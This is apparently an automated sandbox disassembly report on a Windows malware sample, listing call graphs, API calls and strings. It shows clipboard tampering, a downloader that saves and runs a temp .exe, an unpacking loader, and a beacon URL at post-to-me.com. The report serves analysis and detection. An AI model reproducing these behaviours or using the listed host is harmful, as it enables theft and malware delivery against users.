___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65729->65737 65766 42fcde 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65729->65766 65731 40fd6f 65774 42ff6b 28 API calls _Atexit 65731->65774 65734 40fc52 65736 40fc58 65734->65736 65767 42fc82 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65734->65767 65735 40fd77 65739 40fcd9 65737->65739 65768 42a356 167 API calls 4 library calls 65737->65768 65762 4105dd 65739->65762 65742 40fcdf 65743 40fcf4 65742->65743 65769 410613 GetModuleHandleW 65743->65769 65745 40fcfb 65745->65728 65746 40fcff 65745->65746 65747 40fd08 65746->65747 65770 42ff5c 28 API calls _Atexit 65746->65770 65771 410178 13 API calls 2 library calls 65747->65771 65750 40fd10 65750->65736 65752 40fff2 65751->65752 65775 41076b IsProcessorFeaturePresent 65752->65775 65754 40fffe 65776 428817 10 API calls 3 library calls 65754->65776 65756 410003 65761 410007 65756->65761 65777 431791 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65756->65777 65758 410010 65759 41001e 65758->65759 65778 428840 8 API calls 3 library calls 65758->65778 65759->65725 65761->65725 65779 426820 65762->65779 65764 4105f0 GetStartupInfoW 65765 410603 65764->65765 65765->65742 65766->65734 65767->65737 65768->65739 65769->65745 65770->65747 65771->65750 65772->65728 65773->65731 65774->65735 65775->65754 65776->65756 65777->65758 65778->65761 65780 426837 65779->65780 65780->65764 65780->65780 65781 4332ce 65782 4332db 65781->65782 65785 4332f3 65781->65785 65831 42eab9 20 API calls _Atexit 65782->65831 65784 4332e0 65832 42a58d 26 API calls _Deallocate 65784->65832 65789 43334e 65785->65789 65795 4332eb 65785->65795 65833 434cbd 21 API calls 2 library calls 65785->65833 65788 4328f8 __fread_nolock 26 API calls 65790 433366 65788->65790 65789->65788 65801 432e06 65790->65801 65792 43336d 65793 4328f8 __fread_nolock 26 API calls 65792->65793 65792->65795 65794 433399 65793->65794 65794->65795 65796 4328f8 __fread_nolock 26 API calls 65794->65796 65797 4333a7 65796->65797 65797->65795 65798 4328f8 __fread_nolock 26 API calls 65797->65798 65799 4333b7 65798->65799 65800 4328f8 __fread_nolock 26 API calls 65799->65800 65800->65795 65802 432e12 ___BuildCatchObject 65801->65802 65803 432e32 65802->65803 65804 432e1a 65802->65804 65806 432ef8 65803->65806 65811 432e6b 65803->65811 65900 42eaa6 20 API calls _Atexit 65804->65900 65907 42eaa6 20 API calls _Atexit 65806->65907 65808 432e1f 65901 42eab9 20 API calls _Atexit 65808->65901 65809 432efd 65908 42eab9 20 API calls _Atexit 65809->65908 65812 432e7a 65811->65812 65813 432e8f 65811->65813 65902 42eaa6 20 API calls _Atexit 65812->65902 65834 439694 EnterCriticalSection 65813->65834 65815 432e27 __wsopen_s 65815->65792 65818 432e87 65909 42a58d 26 API calls _Deallocate 65818->65909 65819 432e7f 65903 42eab9 20 API calls _Atexit 65819->65903 65820 432e95 65822 432eb1 65820->65822 65823 432ec6 65820->65823 65904 42eab9 20 API calls _Atexit 65822->65904 65835 432f19 65823->65835 65827 432eb6 65905 42eaa6 20 API calls _Atexit 65827->65905 65828 432ec1 65906 432ef0 LeaveCriticalSection __wsopen_s 65828->65906 65831->65784 65832->65795 65833->65789 65834->65820 65836 432f43 65835->65836 65837 432f2b 65835->65837 65839 4332ad 65836->65839 65842 432f88 65836->65842 65919 42eaa6 20 API calls _Atexit 65837->65919 65937 42eaa6 20 API calls _Atexit 65839->65937 65840 432f30 65920 42eab9 20 API calls _Atexit 65840->65920 65845 432f93 65842->65845 65846 432f38 65842->65846 65853 432fc3 65842->65853 65844 4332b2 65938 42eab9 20 API calls _Atexit 65844->65938 65921 42eaa6 20 API calls _Atexit 65845->65921 65846->65828 65849 432fa0 65939 42a58d 26 API calls _Deallocate 65849->65939 65850 432f98 65922 42eab9 20 API calls _Atexit 65850->65922 65854 432fdc 65853->65854 65855 433002 65853->65855 65856 43301e 65853->65856 65854->65855 65889 432fe9 65854->65889 65923 42eaa6 20 API calls _Atexit 65855->65923 65926 433697 21 API calls 3 library calls 65856->65926 65858 433007 65924 42eab9 20 API calls _Atexit 65858->65924 65862 433035 65865 43345a _free 20 API calls 65862->65865 65863 43300e 65925 42a58d 26 API calls _Deallocate 65863->65925 65864 433187 65867 4331fd 65864->65867 65870 4331a0 GetConsoleMode 65864->65870 65868 43303e 65865->65868 65869 433201 ReadFile 65867->65869 65871 43345a _free 20 API calls 65868->65871 65872 433275 GetLastError 65869->65872 65873 43321b 65869->65873 65870->65867 65874 4331b1 65870->65874 65875 433045 65871->65875 65876 433282 65872->65876 65877 4331d9 65872->65877 65873->65872 65878 4331f2 65873->65878 65874->65869 65879 4331b7 ReadConsoleW 65874->65879 65880 43306a 65875->65880 65881 43304f 65875->65881 65935 42eab9 20 API calls _Atexit 65876->65935 65897 433019 __fread_nolock 65877->65897 65932 42ea83 20 API calls __dosmaperr 65877->65932 65893 433240 65878->65893 65894 433257 65878->65894 65878->65897 65879->65878 65884 4331d3 GetLastError 65879->65884 65929 4347de 65880->65929 65927 42eab9 20 API calls _Atexit 65881->65927 65884->65877 65885 43345a _free 20 API calls 65885->65846 65887 433054 65928 42eaa6 20 API calls _Atexit 65887->65928 65888 433287 65936 42eaa6 20 API calls _Atexit 65888->65936 65910 43d355 65889->65910 65933 432c35 31 API calls 2 library calls 65893->65933 65896 43326e 65894->65896 65894->65897 65934 432a75 29 API calls __fread_nolock 65896->65934 65897->65885 65899 433273 65899->65897 65900->65808 65901->65815 65902->65819 65903->65818 65904->65827 65905->65828 65906->65815 65907->65809 65908->65818 65909->65815 65911 43d362 65910->65911 65913 43d36f 65910->65913 65940 42eab9 20 API calls _Atexit 65911->65940 65915 43d37b 65913->65915 65941 42eab9 20 API calls _Atexit 65913->65941 65914 43d367 65914->65864 65915->65864 65917 43d39c 65942 42a58d 26 API calls _Deallocate 65917->65942 65919->65840 65920->65846 65921->65850 65922->65849 65923->65858 65924->65863 65925->65897 65926->65862 65927->65887 65928->65897 65930 434745 __fread_nolock 28 API calls 65929->65930 65931 4347f4 65930->65931 65931->65889 65932->65897 65933->65897 65934->65899 65935->65888 65936->65897 65937->65844 65938->65849 65939->65846 65940->65914 65941->65917 65942->65914

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                                                                                                                                              • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                                                                                                                                                • Part of subcall function 0040CC06: _strlen.LIBCMT ref: 0040CC1D
                                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                                                                                                                                              • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 00401749
                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 00401778
                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 004018BC
                                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 004018D2
                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                                                                                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0040193D
                                                                                                                                                                                                                              • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                              • String ID: i
                                                                                                                                                                                                                              • API String ID: 1583243082-3865851505
                                                                                                                                                                                                                              • Opcode ID: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
                                                                                                                                                                                                                              • Instruction ID: 84ae510e80891b91da9cfa011cccf91080e50da4f88b7c16b45420ac6e32ace8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB51F331C00384DAE711ABA4EC467AD7774FF29306F04523AE805B22B3EB789A85C75D

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A0D
                                                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 00402A23
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000105,?), ref: 00402A3F
                                                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A55
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A8E
                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402ACA
                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AE7
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00402AFD
                                                                                                                                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00402B5E
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B73
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00402B7F
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00402B88
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00402B8B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                              • String ID: .exe$<$ShareScreen
                                                                                                                                                                                                                              • API String ID: 3323492106-493228180
                                                                                                                                                                                                                              • Opcode ID: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
                                                                                                                                                                                                                              • Instruction ID: 1f3e70d10a2fb6dcbdd3680cf8e7ca54fef569da526477a1452c3d554320dc38
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C41847190021CAFEB209F549D85FEA77BCFF04745F0080F6A548E2190DE749E858FA4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00694326
                                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 00694346
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872584271.0000000000693000.00000040.00000020.00020000.00000000.sdmp, Offset: 00693000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_693000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                              • Instruction ID: d4351776c742d57f28ec4352a071606a1dc2febddd161c679795e480469e8230
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97F096325007106BEB203BF69C8DFAEB6EDAF49725F500528F656D19C0DF70EC468A61

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 74 43d02c-43d05c call 43cd8f 77 43d077-43d083 call 43976e 74->77 78 43d05e-43d069 call 42eaa6 74->78 84 43d085-43d09a call 42eaa6 call 42eab9 77->84 85 43d09c-43d0e5 call 43ccfa 77->85 83 43d06b-43d072 call 42eab9 78->83 92 43d34e-43d354 83->92 84->83 94 43d152-43d15b GetFileType 85->94 95 43d0e7-43d0f0 85->95 98 43d1a4-43d1a7 94->98 99 43d15d-43d18e GetLastError call 42ea83 CloseHandle 94->99 96 43d0f2-43d0f6 95->96 97 43d127-43d14d GetLastError call 42ea83 95->97 96->97 101 43d0f8-43d125 call 43ccfa 96->101 97->83 104 43d1b0-43d1b6 98->104 105 43d1a9-43d1ae 98->105 99->83 113 43d194-43d19f call 42eab9 99->113 101->94 101->97 106 43d1ba-43d208 call 4396b7 104->106 107 43d1b8 104->107 105->106 116 43d20a-43d216 call 43cf0b 106->116 117 43d218-43d23c call 43caad 106->117 107->106 113->83 116->117 123 43d240-43d24a call 4335bd 116->123 124 43d24f-43d292 117->124 125 43d23e 117->125 123->92 126 43d2b3-43d2c1 124->126 127 43d294-43d298 124->127 125->123 130 43d2c7-43d2cb 126->130 131 43d34c 126->131 127->126 129 43d29a-43d2ae 127->129 129->126 130->131 133 43d2cd-43d300 CloseHandle call 43ccfa 130->133 131->92 136 43d302-43d32e GetLastError call 42ea83 call 439880 133->136 137 43d334-43d348 133->137 136->137 137->131
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0043CCFA: CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0043D140
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0043D147
                                                                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 0043D153
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0043D15D
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0043D166
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0043D186
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0043D2D0
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0043D302
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0043D309
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                              • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                              • Instruction ID: 76b590644e61a1e30ee63bf02a6fb5b1311e46919e71f325493a9cd527e13796
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09A14732E101049FDF19AF68EC917AE7BB1AF0A324F14115EE815AB3D1D7389D12CB5A

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 142 432f19-432f29 143 432f43-432f45 142->143 144 432f2b-432f3e call 42eaa6 call 42eab9 142->144 146 432f4b-432f51 143->146 147 4332ad-4332ba call 42eaa6 call 42eab9 143->147 161 4332c5 144->161 146->147 150 432f57-432f82 146->150 166 4332c0 call 42a58d 147->166 150->147 151 432f88-432f91 150->151 154 432f93-432fa6 call 42eaa6 call 42eab9 151->154 155 432fab-432fad 151->155 154->166 159 432fb3-432fb7 155->159 160 4332a9-4332ab 155->160 159->160 165 432fbd-432fc1 159->165 163 4332c8-4332cd 160->163 161->163 165->154 169 432fc3-432fda 165->169 166->161 171 432ff7-433000 169->171 172 432fdc-432fdf 169->172 175 433002-433019 call 42eaa6 call 42eab9 call 42a58d 171->175 176 43301e-433028 171->176 173 432fe1-432fe7 172->173 174 432fe9-432ff2 172->174 173->174 173->175 179 433093-4330ad 174->179 205 4331e0 175->205 177 43302a-43302c 176->177 178 43302f-43304d call 433697 call 43345a * 2 176->178 177->178 215 43306a-433090 call 4347de 178->215 216 43304f-433065 call 42eab9 call 42eaa6 178->216 182 4330b3-4330c3 179->182 183 433181-43318a call 43d355 179->183 182->183 187 4330c9-4330cb 182->187 194 4331fd 183->194 195 43318c-43319e 183->195 187->183 191 4330d1-4330f7 187->191 191->183 196 4330fd-433110 191->196 198 433201-433219 ReadFile 194->198 195->194 200 4331a0-4331af GetConsoleMode 195->200 196->183 201 433112-433114 196->201 203 433275-433280 GetLastError 198->203 204 43321b-433221 198->204 200->194 206 4331b1-4331b5 200->206 201->183 207 433116-433141 201->207 209 433282-433294 call 42eab9 call 42eaa6 203->209 210 433299-43329c 203->210 204->203 211 433223 204->211 213 4331e3-4331ed call 43345a 205->213 206->198 212 4331b7-4331d1 ReadConsoleW 206->212 207->183 214 433143-433156 207->214 209->205 222 4332a2-4332a4 210->222 223 4331d9-4331df call 42ea83 210->223 218 433226-433238 211->218 220 4331d3 GetLastError 212->220 221 4331f2-4331fb 212->221 213->163 214->183 225 433158-43315a 214->225 215->179 216->205 218->213 229 43323a-43323e 218->229 220->223 221->218 222->213 223->205 225->183 233 43315c-43317c 225->233 236 433240-433250 call 432c35 229->236 237 433257-433262 229->237 233->183 248 433253-433255 236->248 242 433264 call 432d85 237->242 243 43326e-433273 call 432a75 237->243 249 433269-43326c 242->249 243->249 248->213 249->248
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                              • Instruction ID: 8b8381e38334751f3c5fee40e88eacdf1446f1079df49a385922c4ea532b4e29
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CC10670E04345AFDF11DFA9D841BAEBBB0BF0D305F14519AE805A7392C7789A41CB69

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 250 78003c-780047 251 780049 250->251 252 78004c-780263 call 780a3f call 780e0f call 780d90 VirtualAlloc 250->252 251->252 267 78028b-780292 252->267 268 780265-780289 call 780a69 252->268 270 7802a1-7802b0 267->270 272 7802ce-7803c2 VirtualProtect call 780cce call 780ce7 268->272 270->272 273 7802b2-7802cc 270->273 279 7803d1-7803e0 272->279 273->270 280 780439-7804b8 VirtualFree 279->280 281 7803e2-780437 call 780ce7 279->281 283 7804be-7804cd 280->283 284 7805f4-7805fe 280->284 281->279 286 7804d3-7804dd 283->286 287 78077f-780789 284->287 288 780604-78060d 284->288 286->284 292 7804e3-780505 LoadLibraryA 286->292 290 78078b-7807a3 287->290 291 7807a6-7807b0 287->291 288->287 293 780613-780637 288->293 290->291 294 78086e-7808be LoadLibraryA 291->294 295 7807b6-7807cb 291->295 296 780517-780520 292->296 297 780507-780515 292->297 298 78063e-780648 293->298 302 7808c7-7808f9 294->302 299 7807d2-7807d5 295->299 300 780526-780547 296->300 297->300 298->287 301 78064e-78065a 298->301 303 780824-780833 299->303 304 7807d7-7807e0 299->304 305 78054d-780550 300->305 301->287 306 780660-78066a 301->306 307 7808fb-780901 302->307 308 780902-78091d 302->308 314 780839-78083c 303->314 309 7807e2 304->309 310 7807e4-780822 304->310 311 7805e0-7805ef 305->311 312 780556-78056b 305->312 313 78067a-780689 306->313 307->308 309->303 310->299 311->286 315 78056d 312->315 316 78056f-78057a 312->316 317 78068f-7806b2 313->317 318 780750-78077a 313->318 314->294 319 78083e-780847 314->319 315->311 321 78059b-7805bb 316->321 322 78057c-780599 316->322 323 7806ef-7806fc 317->323 324 7806b4-7806ed 317->324 318->298 325 780849 319->325 326 78084b-78086c 319->326 333 7805bd-7805db 321->333 322->333 327 78074b 323->327 328 7806fe-780748 323->328 324->323 325->294 326->314 327->313 328->327 333->305
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0078024D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                              • Instruction ID: 11e41495bae7d7e4d724454cbfe7a509fbcdab37b2827ee2bc84ff87f4a961b5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19527974A01229DFDBA4CF58C984BA8BBB1BF09304F1480D9E50DAB351DB34AE99DF54

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C1D
                                                                                                                                                                                                                                • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E30
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00402E41
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00402E44
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                                                                                                                                              • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                              • API String ID: 3067768807-1501832161
                                                                                                                                                                                                                              • Opcode ID: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
                                                                                                                                                                                                                              • Instruction ID: 38c4ea95430cb0d064a2c81279cd8101482ed185274a1110c797b87c00f11b19
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C517095A65344A9E320EBB0BC46B3633B8FF58712F10543BE518CB2F2E7B49944875E

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1687354797-0
                                                                                                                                                                                                                              • Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                                                                                                                                              • Instruction ID: ef80ad8abc8d01ee6ed88eea47d540721f1d2954bb97cc6dce8e21ba99fc2e21
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB215172C042489ADF15EBF5D8417DEB7F8AF08318F54407FE400B62C1DB7D89448A69

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Cnd_initX.LIBCPMT ref: 00405812
                                                                                                                                                                                                                              • __Cnd_signal.LIBCPMT ref: 0040581E
                                                                                                                                                                                                                              • std::_Cnd_initX.LIBCPMT ref: 00405833
                                                                                                                                                                                                                              • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 0040583A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2059591211-0
                                                                                                                                                                                                                              • Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                                                                                                                                              • Instruction ID: aebd2ac95218272d728fe4b8aabd0d06745c53d3a4d3bf2acc4ab23466c53149
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FF082324007009BE7313772C80770A77A0AF04319F54883EF456769E2DBBEA8585A5D

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 415 402956-4029c1 call 426820 call 42a33b call 42b444 call 402819 424 4029c3-4029c6 415->424 425 4029cf-4029e9 call 404329 call 40f8c5 415->425 424->425 427 4029c8-4029cc 424->427 427->425 429 4029ce 427->429 429->425
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00402985
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00402995
                                                                                                                                                                                                                                • Part of subcall function 00402819: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                                                                                                                                              • String ID: +@
